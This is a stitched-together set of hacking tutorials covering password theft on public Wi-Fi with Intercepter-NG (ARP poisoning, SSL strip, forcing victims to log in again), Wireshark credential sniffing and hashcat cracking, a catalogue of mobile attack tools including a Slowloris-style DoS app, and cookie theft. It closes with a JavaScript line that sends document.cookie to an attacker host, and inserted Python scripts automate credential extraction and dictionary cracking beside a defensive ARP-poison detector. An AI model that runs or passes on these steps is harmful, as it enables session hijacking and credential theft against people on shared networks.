How to intercept data. Experiment: How to Steal Identity Using Free Wi-Fi. Protecting cookies from hacking

The method is old but effective; we will do everything with Intercepter-NG.
1. Download the program from sniff.su.
2. Launch it and select the network interface. Switch the type between Ethernet and Wi-Fi: if you are on Wi-Fi, select the Wi-Fi icon (to the left of the network selection).


3. Press the Scan Mode button (radar icon).
Right-click in the empty field and choose Smart scan from the context menu.
All devices connected to the network will be listed. Select a victim (you can select several by holding Shift), but do not mark the router itself; its IP is usually 192.168.1.1.
Once selected, right-click and choose Add to NAT.


4. Go to the NAT tab.
In Stealth IP it is advisable to change the last octet to any unused address; the program then sends its own traffic from that address, which hides your real IP (the forged ARP replies still carry your adapter's MAC address).
Tick SSL Strip and SSL MITM (in v0.9.10 click the eye in the hat and choose them there). SSL Strip only works where the site and browser allow a downgrade to plain HTTP (HSTS defeats it); SSL MITM presents a forged certificate, which a modern browser warns about.


5. Press Settings (the gears on the right).
Tick Resurrection (this reassembles files transferred over protocols such as HTTP, FTP, IMAP, POP3, SMTP and SMB from the captured traffic; it does not by itself break HTTPS, which is what SSL Strip and SSL MITM are for) and untick Spoof IP/MAC. You can also tick Cookie Killer: it drops the victim's current session on, for example, a social network, so the victim has to re-enter the password, which we then intercept. Compare your settings with the picture.


6. Press the Start/Stop Sniffing button at the top (the triangle), then, in the same window, the radiation icon below it, Start/Stop ARP Poison. Go to the Password Mode tab, right-click in the window and choose Show Cookies (this shows the cookies and passwords entered by victims).
That is all; now we wait for someone to enter a password. Sometimes the victims' Internet stops working: try to go online yourself, and if it does not work, restart the program.
I noticed that it is not always possible to intercept the password, but in fact it works almost without failure.
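The ARP poisoning that Start ARP Poison relies on is also what gives the attack away. As an added example (not from the tutorial or from Intercepter-NG), here is a small Python detector that takes raw Ethernet/ARP frames, as a sensor on the same segment would see them, and alerts when an IP address starts being advertised from a different MAC or when one MAC claims several addresses. The frames, addresses and MACs are constructed inside the script.

```python
# Added example (not from the Intercepter-NG tutorial): the defensive
# counterpart of step 6. "Start ARP Poison" works by sending forged ARP
# replies, so a sensor on the same segment can catch it. All frames below
# are constructed in this file; no capture library is needed.
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Build a raw Ethernet + ARP reply frame (constructed test input)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet/IPv4, hlen 6, plen 4
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp_reply(frame: bytes):
    """Return (sender_mac, sender_ip) for an ARP reply frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    if struct.unpack("!H", frame[20:22])[0] != ARP_REPLY:
        return None
    sender_mac = ":".join(f"{b:02x}" for b in frame[22:28])
    sender_ip = ".".join(str(b) for b in frame[28:32])
    return sender_mac, sender_ip


def detect_arp_poison(frames, gateway_ip=None):
    """Flag an IP whose advertised MAC changes, and a MAC that claims
    several IPs (the attacker impersonates both victim and gateway).
    The gateway, if given, is named in the alert because that is the
    address a NAT-mode MITM has to hijack."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for frame in frames:
        parsed = parse_arp_reply(frame)
        if parsed is None:
            continue
        mac, ip = parsed
        known = ip_to_mac.setdefault(ip, mac)  # first sighting is trusted
        if known != mac:
            label = "gateway " if ip == gateway_ip else ""
            alerts.append(f"{label}{ip} moved from {known} to {mac}")
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(f"{mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


# Constructed scenario: two legitimate replies, then an attacker NIC
# (aa:bb:cc:00:00:66) poisons the victim (claiming the gateway's IP)
# and the gateway (claiming the victim's IP).
GATEWAY, VICTIM = "192.168.1.1", "192.168.1.10"
GW_MAC, VICTIM_MAC, ATTACKER_MAC = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:10", "aa:bb:cc:00:00:66"

LEGIT = [
    build_arp_reply(GW_MAC, GATEWAY, VICTIM_MAC, VICTIM),
    build_arp_reply(VICTIM_MAC, VICTIM, GW_MAC, GATEWAY),
]
POISONED = LEGIT + [
    build_arp_reply(ATTACKER_MAC, GATEWAY, VICTIM_MAC, VICTIM),
    build_arp_reply(ATTACKER_MAC, VICTIM, GW_MAC, GATEWAY),
]

if __name__ == "__main__":
    for alert in detect_arp_poison(POISONED, gateway_ip=GATEWAY):
        print("ALERT:", alert)
```

Stealth IP only changes the IP address the program uses for its own connections; the forged replies still carry the attacker's adapter MAC, which is what the second check keys on. A real sensor would read frames from a raw socket or a pcap file and rate-limit the alerts, since poisoners re-send their replies periodically to keep the caches poisoned.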

Many users do not even realize that the login and password they type when registering or logging in to a restricted site, and submit with ENTER, can easily be intercepted. Very often they are transmitted over the network unprotected. So if the site you are logging in to uses plain HTTP, it is easy to capture this traffic, analyze it with Wireshark, and then use display filters and cracking tools to find the password and, if it was hashed, recover it.

The best place to intercept passwords is the network core, where all users' traffic to internal resources (for example, mail) passes, or in front of the router to the Internet, for logins to external resources. Set up a port mirror there and you are ready to feel like a hacker.

Step 1. Install and run Wireshark to capture traffic

Sometimes it is enough to select the interface on which we plan to capture and click Start. In our case we capture on the wireless interface.

Traffic capture has begun.

Step 2. Filtering captured POST traffic

Open a browser and log in to any resource with a username and password. Once authorization completes and the site opens, stop the capture in Wireshark. The analyzer now shows a large number of packets, and this is where many give up because they do not know what to do next. We are interested in specific packets: the POST request that our machine builds when the form on screen is filled in and that is sent to the remote server when you click Login or Sign in in the browser.

Enter a display filter in the packet list: http.request.method == "POST"

Instead of thousands of packets we now see just one, with the data we are looking for.

Step 3. Find the username and password

Right-click it and choose Follow > TCP Stream from the menu.


A new window shows the reassembled text of the exchange. Look for fields such as "password" and "user", which hold the password and username. Often both are readable plaintext, but if you capture a login to a large, well-known service such as Mail.ru, Facebook or VKontakte, the password will be hashed (and in practice the whole session will be HTTPS, see Step 6):

HTTP/1.1 302 Found
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: password=; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/
Location: loggedin.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Thus, in our case:

Username: networkguru

Password:

Step 4. Determining the hash type in order to crack the password

Go, for example, to http://www.onlinehashcrack.com/hash-identification.php#res and paste the captured value into the identification window. I was given a list of candidate hash types in order of likelihood:

Step 5. Cracking the user's password

At this stage we can use the hashcat utility (-m 0 selects MD5, -a 0 a straight dictionary attack; the hash file comes first, then the wordlist):

~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

The output gives us the recovered password: simplepassword

Thus, with Wireshark we can not only troubleshoot applications and services but also try ourselves as a hacker, intercepting the passwords users enter in web forms. You can also pick out mailbox passwords with simple display filters (POP3, IMAP and SMTP AUTH credentials are at best Base64-encoded unless the session uses TLS):

  • POP3: pop.request.command == "USER" || pop.request.command == "PASS"
  • IMAP: imap.request contains "login"
  • SMTP: smtp.req.command == "AUTH"

and, for hashed values, more serious cracking utilities such as hashcat.
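What steps 2 to 5 do by hand, as an added example that is not part of the original article: a small Python script that applies the POST filter to a reassembled TCP stream, pulls the form fields out, identifies the hash by its length (the logic behind step 4) and runs the dictionary attack that hashcat -m 0 -a 0 performs. The TCP stream, the wordlist and the password hash are constructed in the script; only the username and the recovered password match the walkthrough.

```python
# Added example (not from the original article): "Follow TCP Stream" plus
# hash identification plus hashcat -a 0, in a few dozen lines. The stream,
# hash and wordlist below are constructed for this example.
import hashlib
from urllib.parse import parse_qs

# Length-based identification, the logic behind step 4. The number is the
# hashcat -m mode (0 = MD5, 1000 = NTLM, 100 = SHA-1, 1400 = SHA-256);
# a 32-hex value is ambiguous, which is why identifiers return a ranked list.
HASH_TYPES_BY_LENGTH = {
    32: [("MD5", 0), ("NTLM", 1000)],
    40: [("SHA-1", 100)],
    64: [("SHA-256", 1400)],
}
HASHLIB_NAMES = {"MD5": "md5", "SHA-1": "sha1", "SHA-256": "sha256"}


def parse_post_credentials(stream: bytes) -> dict:
    """Equivalent of http.request.method == "POST" followed by reading the
    form body: the urlencoded fields of a POST request at the start of a
    reassembled TCP stream, or {} if the request is not a POST."""
    head, _, rest = stream.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    if not lines[0].startswith(b"POST "):
        return {}
    length = 0
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    body = rest[:length].decode()
    return {k: v[0] for k, v in parse_qs(body).items()}


def identify_hash(value: str):
    """Candidate algorithms for a hex digest, most likely first."""
    value = value.strip().lower()
    if not value or not all(c in "0123456789abcdef" for c in value):
        return []
    return HASH_TYPES_BY_LENGTH.get(len(value), [])


def dictionary_attack(digest: str, wordlist, algorithm="MD5"):
    """hashcat -a 0 in miniature: hash every candidate word and compare."""
    digest = digest.strip().lower()
    name = HASHLIB_NAMES[algorithm]
    for word in wordlist:
        if hashlib.new(name, word.encode()).hexdigest() == digest:
            return word
    return None


def crack_from_stream(stream: bytes, wordlist):
    """Extract, identify, crack: returns (user, password or None, algorithm)."""
    fields = parse_post_credentials(stream)
    digest = fields.get("password", "")
    for algorithm, _mode in identify_hash(digest):
        if algorithm in HASHLIB_NAMES:  # NTLM is not in hashlib; skip it here
            word = dictionary_attack(digest, wordlist, algorithm)
            if word is not None:
                return fields.get("user"), word, algorithm
    return fields.get("user"), None, None


# Constructed sample: a login form whose JavaScript hashed the password
# client-side before submitting it over plain HTTP.
PASSWORD_HASH = hashlib.md5(b"simplepassword").hexdigest()
BODY = f"user=networkguru&password={PASSWORD_HASH}"
SAMPLE_STREAM = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: 192.168.1.20\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"Content-Length: {len(BODY)}\r\n"
    "\r\n" + BODY
).encode()
WORDLIST = ["123456", "password", "qwerty", "simplepassword", "letmein"]  # constructed

if __name__ == "__main__":
    print(crack_from_stream(SAMPLE_STREAM, WORDLIST))
```

The script stops at the first algorithm that yields a match, which mirrors how you would work through an identifier's ranked list with hashcat: try -m 0 first, then the next candidate. Against a real capture, feed it the bytes that Follow > TCP Stream shows for the client side of the conversation.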

Step 6. What if the traffic is encrypted with HTTPS?

There are several options.

Option 1. Capture the connection setup between the user and the server (the TLS handshake). The handshake alone does not reveal the session key: with RSA key exchange the pre-master secret is encrypted to the server's public key and can only be recovered with the server's private key; with (EC)DHE key exchange it is never transmitted at all.

Option 2. Decrypt HTTPS traffic using the session key log file written by Firefox or Chrome. The browser must be configured to write its TLS secrets to a log file (set the SSLKEYLOGFILE environment variable before starting the browser), and you need that file. In other words, you would have to take the key log file from another user's hard disk (which is illegal). Then capture the traffic and use the keys to decrypt it.

Clarification. This refers to the browser of the person whose password is being stolen. If you mean decrypting your own HTTPS traffic to practise, this approach works. If you are trying to decrypt other users' HTTPS traffic without access to their computers, it will not: that is exactly what the encryption is there for.

After obtaining the keys for option 1 or 2, register them in Wireshark:

  1. Go to Edit > Preferences > Protocols > TLS (called SSL in older versions).
  2. Set the flag "Reassemble TLS records spanning multiple TCP segments".
  3. For a browser key log file, set "(Pre)-Master-Secret log filename" to the path of that file.
  4. For a server private key, open "RSA keys list", click Edit, fill in all the fields and give the path to the key file.

Wireshark can decrypt with a server private key only when the session used RSA key exchange. If DHE/ECDHE suites (forward secrecy, ECC) were negotiated, the private key does not help and only a key log will do.

Option 3. Gain access to the web server the user talks to and take its private key. This is even harder. In corporate networks this kind of decryption is done legitimately, for application debugging or content filtering, but not to steal user passwords.
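To make options 1 to 3 concrete, an added example (not from the original article) that models the two Wireshark preferences: it parses a TLS 1.2 ClientHello and ServerHello, looks the client random up in an SSLKEYLOGFILE-style key log the way Wireshark does, and reports whether a server private key would be of any use given the negotiated cipher suite. The handshake records, randoms and master secret are dummy values constructed inside the script; the cipher suite numbers are the standard IANA ones.

```python
# Added example (not from the original article): how Wireshark ties a
# browser key log (option 2) to a captured session, and why a server RSA
# key (options 1 and 3) only helps for RSA key exchange. Records, randoms
# and the master secret are constructed dummies.
import struct

CLIENT_HELLO, SERVER_HELLO = 1, 2

# Suites whose pre-master secret is RSA-encrypted to the server key: the only
# ones the "RSA keys list" preference can decrypt.
RSA_KEY_EXCHANGE_SUITES = {0x002F, 0x0035, 0x003C, 0x003D, 0x009C, 0x009D}
SUITE_NAMES = {
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x009C: "TLS_RSA_WITH_AES_128_GCM_SHA256",
    0xC02F: "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",
    0xC030: "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384",
}


def build_hello(hs_type: int, random: bytes, suites) -> bytes:
    """Minimal TLS 1.2 ClientHello/ServerHello record (constructed input)."""
    body = b"\x03\x03" + random + b"\x00"  # version, 32-byte random, empty session id
    if hs_type == CLIENT_HELLO:
        body += struct.pack("!H", 2 * len(suites))
        body += b"".join(struct.pack("!H", s) for s in suites)
        body += b"\x01\x00"  # one compression method: null
    else:
        body += struct.pack("!H", suites[0]) + b"\x00"  # chosen suite, null compression
    handshake = bytes([hs_type]) + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x03" + struct.pack("!H", len(handshake)) + handshake


def parse_hello(record: bytes) -> dict:
    """Pull the random and the offered/chosen cipher suites out of a Hello."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    hs_type = record[5]
    off = 5 + 4 + 2  # record header, handshake header, protocol version
    random = record[off:off + 32].hex()
    off += 32
    off += 1 + record[off]  # skip session id
    if hs_type == CLIENT_HELLO:
        n = struct.unpack("!H", record[off:off + 2])[0]
        off += 2
        suites = [struct.unpack("!H", record[off + i:off + i + 2])[0] for i in range(0, n, 2)]
    elif hs_type == SERVER_HELLO:
        suites = [struct.unpack("!H", record[off:off + 2])[0]]
    else:
        raise ValueError("not a ClientHello or ServerHello")
    return {"type": hs_type, "random": random, "suites": suites}


def parse_keylog(text: str) -> dict:
    """SSLKEYLOGFILE format: 'CLIENT_RANDOM <client random hex> <master secret hex>'
    per TLS 1.2 session; '#' lines are comments (TLS 1.3 uses other labels)."""
    secrets = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == "CLIENT_RANDOM":
            secrets[parts[1].lower()] = parts[2].lower()
    return secrets


def master_secret_for(client_hello: bytes, keylog: dict):
    """Wireshark's lookup: client random seen in the capture -> master secret."""
    return keylog.get(parse_hello(client_hello)["random"])


def server_key_can_decrypt(server_hello: bytes) -> bool:
    """True only if the suite the server chose uses RSA key exchange."""
    return parse_hello(server_hello)["suites"][0] in RSA_KEY_EXCHANGE_SUITES


# Constructed session: dummy randoms and a dummy 48-byte master secret.
CLIENT_RANDOM = bytes(range(32))
SERVER_RANDOM = bytes(range(32, 64))
MASTER_SECRET = "ab" * 48
KEYLOG = f"# constructed key log\nCLIENT_RANDOM {CLIENT_RANDOM.hex()} {MASTER_SECRET}\n"
CLIENT_HELLO_REC = build_hello(CLIENT_HELLO, CLIENT_RANDOM, [0xC02F, 0x002F])
ECDHE_SERVER_HELLO = build_hello(SERVER_HELLO, SERVER_RANDOM, [0xC02F])
RSA_SERVER_HELLO = build_hello(SERVER_HELLO, SERVER_RANDOM, [0x002F])

if __name__ == "__main__":
    print("key log secret:", master_secret_for(CLIENT_HELLO_REC, parse_keylog(KEYLOG)))
    for rec in (ECDHE_SERVER_HELLO, RSA_SERVER_HELLO):
        suite = parse_hello(rec)["suites"][0]
        print(SUITE_NAMES[suite], "decryptable with server key:", server_key_can_decrypt(rec))
```

The key log lookup works for any key exchange because the browser writes the secret it already has; the private-key path fails for ECDHE because the secret was never encrypted to that key. Either way the check to run before spending time on a capture is the ServerHello's cipher suite.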

BONUS VIDEO: Wireshark Packet Sniffing Usernames, Passwords, and Web Pages

"A smartphone with hacking tools? No such thing," we would have said until recently. Some of the familiar attack tools could be run only on Maemo. Now many familiar tools have been ported to iOS and Android, and some hacking tools have been written specifically for mobile. Can a smartphone replace a laptop in penetration tests? We decided to check.

ANDROID

Android is a popular platform not only for ordinary mortals but also for the right kind of people. The number of useful hacker utilities is off the scale. We can thank the system's UNIX roots for that: they greatly simplified porting many tools to Android. Alas, Google does not allow some of them into the Play Store, so you will have to install the corresponding APKs by hand. Some utilities also need full access to the system (for example, the iptables firewall), so take care of root access in advance. Each manufacturer uses its own technology, but instructions are easy to find. A decent set of HOWTOs has been collected by LifeHacker (bit.ly/eWgDlu), and if your model is not there, the XDA-Developers forum (www.xda-developers.com) always comes to the rescue with information on virtually any Android phone. One way or another, some of the utilities described below work without root access.

Let's start with an unusual package manager. The developers call it "superuser utilities", and that is not far from the truth. After installing BotBrew you get a repository from which you can download a huge number of familiar tools compiled for Android: Python and Ruby interpreters to run the many tools written in them, the tcpdump sniffer and the Nmap scanner for network analysis, Git and Subversion for version control, and much more.

Network scanners

An inconspicuous smartphone that, unlike a laptop, fits in a pocket and never arouses suspicion can be useful for network reconnaissance. We mentioned above how to install Nmap, but there is another option. PIPS is a specially adapted, albeit unofficial, port of the Nmap scanner for Android. It lets you quickly find live hosts on the network, determine their OS with the fingerprinting options and scan ports; in short, everything Nmap can do.

Nmap, for all its power, has two problems. First, the scan parameters are passed as command-line switches, which you need not only to know but also to type on an inconvenient mobile keyboard. Second, the console output is not as readable as we would like. The Fing scanner has neither shortcoming: it scans the network very quickly, fingerprints hosts and then shows all available devices in a clear list grouped by type (router, desktop, iPhone and so on). For each host you can quickly see the open ports, and from there connect, say, to FTP using the FTP client installed on the system, which is very convenient.

When it comes to analyzing a specific host, NetAudit can be indispensable. It works on any Android device (even an unrooted one) and lets you not only quickly identify devices on the network but also examine them against a large fingerprint database to determine the operating system and the CMS running on the web server. The database now holds more than 3000 fingerprints.

If, on the contrary, you need to work at a lower level and thoroughly investigate how the network behaves, you cannot do without Net Tools. It is an indispensable toolkit for a system administrator, allowing full diagnosis of the network the device is connected to. The package contains more than 15 programs, such as ping, traceroute, arp, dns, netstat and route.

Traffic manipulation

The tcpdump-based sniffer honestly logs all data to a pcap file, which can then be examined with familiar tools like Wireshark or NetworkMiner. Since it has no MITM capabilities, it is rather a tool for analyzing the device's own traffic. For example, it is a great way to learn what programs installed from questionable repositories are transmitting.

Among the offensive Android applications, one of the most notorious is FaceNiff, which hijacks and injects into intercepted web sessions. After downloading the APK you can run this tool on almost any Android smartphone and, once connected to a wireless network, capture accounts of various services: Facebook, Twitter, VKontakte and so on, more than ten in total. Session hijacking is done by ARP spoofing, but the attack only works on unprotected connections (FaceNiff cannot break into SSL traffic). To keep script kiddies at bay, the author limited the number of sessions to three; beyond that you need to ask the developer for an activation code.

If FaceNiff's author wants money for it, DroidSheep is a completely free tool with the same functionality. True, you will not find the package on the official site (because of Germany's strict laws on security utilities), but it is easy to find on the Web. Its main task is to hijack users' web sessions on popular social networks, again by ARP spoofing. But secure connections are a problem: like FaceNiff, DroidSheep flatly refuses to work with HTTPS.

This utility also demonstrates the insecurity of open wireless networks, but in a slightly different way. It does not hijack sessions; it routes HTTP traffic through itself with a spoofing attack and performs the manipulations you specify: from simple pranks (replacing all pictures on a site with trollfaces, flipping the images or, say, replacing Google search results) to phishing attacks with fake pages for popular services such as facebook.com, linkedin.com, vkontakte.ru and many others.

If you ask which Android hacking utility is the most powerful, Anti probably has no rivals. It is a real hacker's combine harvester. Its main task is scanning the network perimeter; then various modules come into play, implementing a whole arsenal: traffic sniffing, MITM attacks and exploitation of the vulnerabilities found. There are drawbacks too. The first thing you notice is that exploitation runs only from the program's central server on the Internet, so you can forget about targets without an external IP address.

Tunneling traffic

The well-known file manager is now on smartphones too! As in the desktop version there is a plug-in system for connecting to network shares, and the canonical two-pane mode, which is especially convenient on tablets.

Okay, but how do you keep your data safe on an open wireless network? Besides the VPN that Android supports out of the box, you can set up an SSH tunnel. The excellent SSH Tunnel utility wraps the traffic of selected applications, or of the whole system, through a remote SSH server.

It is often necessary to send traffic through an HTTP or SOCKS proxy, and ProxyDroid helps here. It is simple: you choose which applications' traffic to tunnel and specify the proxy (HTTP/HTTPS/SOCKS4/SOCKS5 are supported). If authentication is required, ProxyDroid supports that too. The configuration can be tied to a specific wireless network, with different settings for each.

Wireless networks

The built-in wireless manager is not very informative. If you need a quick, complete picture of nearby access points, Wifi Analyzer is a great choice. It shows all nearby access points along with their channel, MAC address and, most importantly, the encryption type (seeing the cherished letters "WEP", we can assume access to the "secure" network is as good as granted). The utility is also ideal for locating where an access point physically is, thanks to a clear signal strength indicator.

According to its developer, this utility is useful when the wireless network is packed with clients hogging the whole channel and you need a good, stable connection right now. WiFiKill lets you cut clients off from the Internet, either selectively or by criterion (for example, you can prank every Apple device). The program simply runs an ARP spoofing attack and redirects all clients to itself; the algorithm is trivially implemented on top of iptables. A control panel for wireless fast-food networks, if you like :).

Web application audit

Manipulating HTTP requests from a computer is easy; there are countless utilities and browser plugins for it. On a smartphone things are a bit more complicated. HTTP Query Builder sends a custom HTTP request with the parameters you need, for example a chosen cookie or a modified User-Agent. The result is displayed in the standard browser.

If a site is protected with HTTP Basic authentication, you can test its strength with Router Brute Force ADS 2. The utility was written to brute-force router admin passwords, but it can obviously be used against any other resource with the same protection. It works, but is clearly unfinished: for example, it does not support exhaustive brute force, only dictionary attacks.

You have probably heard of Slowloris, the notorious program for taking down web servers. Its principle: open and hold the maximum number of connections to a remote web server, preventing new clients from connecting. AnDOSid is a Slowloris analogue right on your Android device! I'll tell you a secret: two hundred connections are enough to destabilize every fourth website running on the Apache web server. And all this from your phone!

Miscellaneous utilities

When working with web applications and analyzing their logic, you often encounter data transmitted in encoded form, namely Base64. Encode helps you decode such data and see what it actually contains. Perhaps, by inserting a quotation mark, encoding it back into Base64 and substituting it into the URL of the site under investigation, you will get the coveted database query error.

If you need a hex editor, Android has one too. HexEditor can edit any file, including system files if you grant it superuser rights. It is a great replacement for the standard text editor, letting you easily find a piece of text and change it.

Remote access

After gaining access to a remote host you need to be able to use it, and that requires clients. Let's start with SSH, where ConnectBot is the de facto standard. Besides a user-friendly interface, it can set up secure tunnels over SSH connections.

A useful program for connecting to a remote desktop over RDP or VNC. It is very convenient that these are two clients in one, so there is no need for separate tools for RDP and VNC.

A MIB browser written specifically for Android, with which you can manage network devices over SNMP. It can be useful for building an attack on routers, since default community strings (in other words, the password for SNMP management) have not gone away yet.

iOS

The iOS platform is no less popular with security tool developers. But where Android needed root only for some applications, on Apple devices a jailbreak is almost always required. Fortunately, a jailbreak already exists even for the latest iDevice firmware (5.1.1). Along with full access you also get the alternative Cydia package manager, which already holds many utilities.

Working with the system

The first thing to do is install a terminal. For obvious reasons it is not part of the mobile OS, but we need it to run the console utilities discussed below. The best terminal emulator is MobileTerminal: it supports several terminals at once, gestures for control (for example, to send Control-C) and is generally impressively thought through.

Another, more involved way to get a console on the device is to install OpenSSH on it (via Cydia) and connect to it locally with an SSH client. With a good client like iSSH, which has excellent touch-screen controls, this is even more convenient than MobileTerminal.

Data interception

Now that you have a console you can try the utilities. Let's start with Pirni, which went down in history as a full-fledged sniffer for iOS. Unfortunately, the Wi-Fi module built into the device is limited by design and cannot be switched to promiscuous mode, which normal packet capture requires. So interception uses classic ARP spoofing, which routes all traffic through the device itself. The standard version runs from the console, where, besides the MITM parameters, you give the name of the PCAP file all traffic is logged to. There is a more advanced version, Pirni Pro, with a graphical interface; moreover, it can parse HTTP traffic on the fly and even automatically extract interesting data (for example, logins and passwords) using regular expressions defined in its settings.

The notorious sniffer Intercepter-NG, which we have written about many times, recently got a console version. As the author says, most of the code is pure ANSI C, which behaves the same in almost any environment, so the console version worked from the start on desktop Windows, Linux and BSD as well as on mobile platforms, including iOS and Android. The console version already grabs passwords transmitted over various protocols, intercepts messenger messages (ICQ/Jabber and many others) and resurrects files from traffic (HTTP/FTP/IMAP/POP3/SMTP/SMB). Network scanning and high-quality ARP poisoning are available as well. For it to work you must first install the libpcap package via Cydia (remember to enable developer packages in the settings). The whole startup instruction boils down to setting the right permissions: chmod +x intercepter_ios. Then, if you run the sniffer without parameters, Intercepter's clear interactive interface appears, letting you launch any of its attacks.

Hard to believe, but this most complex of MITM tools has also been ported to iOS. After colossal work a full-fledged mobile port came out. To spare yourself dancing around dependencies when compiling it yourself, it is better to install the ready-built package via Cydia after adding theworm.altervista.org/cydia (the TWRepo repository) as a source. The package also includes the etterlog utility, which helps extract various useful information (for example, FTP credentials) from the collected traffic dump.

Analysis of wireless networks

On old iOS versions craftsmen ran aircrack and could break a WEP key, but we checked: the program does not work on new devices. So for exploring Wi-Fi we have to settle for Wi-Fi scanners only. WiFi Analyzer collects and displays information about all 802.11 networks in range, including SSID, channels, vendors, MAC addresses and encryption types. It draws live graphs from the data on the air. With it, it is easy to find where an access point physically is if you have forgotten, and, for example, to look at the WPS PIN, which can be useful for connecting.

Network scanners

What program does every pentester use, anywhere in the world, regardless of the task? A network scanner. On iOS that will most likely be the powerful Scany toolkit. With its set of built-in utilities you can quickly get a detailed picture of network devices and, for example, their open ports. The package also includes network testing utilities such as ping, traceroute and nslookup.

Many people prefer Fing, however. Its functionality is fairly simple and limited, but quite enough for a first look at, say, a cafe network :). The results show the available services on remote machines, plus the MAC addresses and hostnames connected to the scanned network.

It would seem that everyone has forgotten about Nikto, but why? This web vulnerability scanner, written in a scripting language (Perl), is easy to install through Cydia, which means you can run it on a jailbroken device from the terminal. Nikto will happily provide additional information about the web resource under test. You can also add your own search signatures to its knowledge base.

This powerful tool for automated exploitation of SQL injection is written in Python, so once the interpreter is installed it can be used without any problems directly from a mobile device.

Remote control

Many network devices (including expensive routers) are managed over SNMP. This utility scans subnets for reachable SNMP services with a known community string (in other words, default passwords). Note that searching for SNMP services with default community strings (public/private) in an attempt to gain management access is an integral part of any penetration test, alongside mapping the perimeter and enumerating services.

Two utilities from the same vendor for connecting to a remote desktop over RDP and VNC. There are many such utilities in the App Store, but these are especially convenient.

Password recovery

The legendary program that helps millions of hackers around the world to "remember" a password has been ported to iOS. You can now brute-force passwords for HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 and many other services directly from an iPhone. For a more effective attack, stock up on good wordlists.

Everyone knows the default-password vulnerability first-hand. Pass Mule is a kind of directory of default logins and passwords for network devices. They are conveniently categorized by vendor, product and model, so finding the right one is easy. The program is really meant to save the time spent searching for the manual of a router whose default login and password you need.

Exploiting vulnerabilities

It is hard to imagine a more hackerish utility than Metasploit, and it concludes today's review. Metasploit is a collection of tools whose main job is exploiting software vulnerabilities. Imagine: about 1000 reliable, proven exploits a pentester needs every day, right on your smartphone! With such a tool you can really settle into any network. Metasploit lets you exploit not only holes in server applications; there are also tools for attacking client applications (for example, the Browser Autopwn module, which injects a payload into client traffic). It must be said that there is no mobile version of the framework, but you can install the standard package on an Apple device using.

What is a cookie?

There is a mechanism that lets an HTTP server store some text information in the browser and read it back later. This information is called a cookie. Each cookie is a pair: a parameter name and its value. Each cookie is also assigned the domain it belongs to, and for security reasons all browsers send a cookie only to the domain it was set for. Cookies can also have an expiration date, in which case they stay on the computer until that date even if you close all browser windows.


Why are cookies important?

In all multi-user systems cookies are used to identify a user, or rather the user's current session with the service. If someone learns your cookies they can act on the site on your behalf, because at the moment very few Internet resources check for a change of IP address within one user session.


How do I change or replace a cookie?

Browser developers did not provide built-in cookie editing tools (today the developer tools of any major browser can show and edit cookies). But you can get by with plain Notepad and Internet Explorer's context-menu extension mechanism.


Step 1: create a text file with the following content (the registry key line was missing from this page and is reconstructed from IE's MenuExt mechanism and the menu name used in Step 5):

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Working with Cookies]
@="C:\\IE_ext.htm"

Save it under the name IE_ext.reg.

Step 2: double-click the created file to import the changes into the Windows registry.

Step 3: create a text file with the following content (the closing script tag was missing from the page and is restored):

<script language="javascript">
external.menuArguments.clipboardData.setData("Text", external.menuArguments.document.cookie);
external.menuArguments.document.cookie = "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);
</script>

Save it as C:\IE_ext.htm

Step 4: open the website of interest.

Step 5: right-click on an empty area of the page and select the "Working with Cookies" menu item. Allow access to the clipboard. Your cookies for this site are now on the clipboard; paste them into Notepad to see them.


Step 6: to change a cookie, edit C:\IE_ext.htm, replacing testname with the cookie's name, testvalue with its value and testdomain.ru with the site's domain. Add more similar lines if needed. For ease of control I added the output of the current cookies before and after the change to the script: alert(external.menuArguments.document.cookie);

Step 7: perform Step 5 again, then refresh the page.

Result: we are now on the site with the updated cookies.

How to steal a cookie using JavaScript?

If an attacker has found a way to execute arbitrary JavaScript in the victim's browser, reading the current cookies is trivial. Example:


var str = document.cookie;

But can he send them to his own site? As mentioned earlier, a script cannot access a site in a different domain without extra permission. It turns out, however, that a script can load any image from any HTTP server, and can pass arbitrary text in the request for that image, for example http://hackersite.ru/xss.jpg?text_info. So if this code runs:

var img = new Image();
img.src = "http://hackersite.ru/xss.jpg?" + encodeURI(document.cookie);


then the cookies end up in the request for the "picture" and travel to the attacker.

How are such requests for a "picture" handled?

